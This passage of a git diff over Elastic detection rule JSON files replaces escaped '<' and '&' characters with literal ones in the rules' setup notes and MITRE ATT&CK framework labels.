`C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json index bdf0f239bdc..b08f9f2fb61 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json index ef692fa2030..f137d89cd23 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json index a267d40383f..4910d0fa0d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_106.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json index 886542f9c1a..37ec308d1b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_107.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json index ae74b2ac180..2b9b55ed923 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_4.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json index 49413c133a3..cfaec07a8eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_5.json @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json index d61f6038772..7f821e18ab4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json +++ b/packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_6.json @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json index e27a0176235..f90c46c0bcf 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_104.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json index 7749905d8aa..eaa1390ce21 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_105.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json index b3ac178f45a..0c8e934feed 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_106.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json index a26ea0e0e25..25409b7ca28 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_107.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -119,7 +119,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json index 27e11713f99..ff926d567b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_108.json @@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -103,7 +103,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json index 8cfe72e6e3e..b6e76254df9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_103.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json index 8019ce99661..521bbcb1cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_104.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json index eb4f7c06082..d55ede41639 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_105.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json index 50cfc438574..9966b1114c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_205.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json index 9812ad05d0d..8671622f9dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_206.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json index 464592bb652..2498d07380d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_207.json @@ -67,7 +67,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json index 8383098de06..0c2f516f713 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_104.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json index 93630163e87..757c6cfa80b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json index 857d9af3e2a..f6353cd359f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_106.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json index 5631a498647..3761142cca0 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_107.json +++ 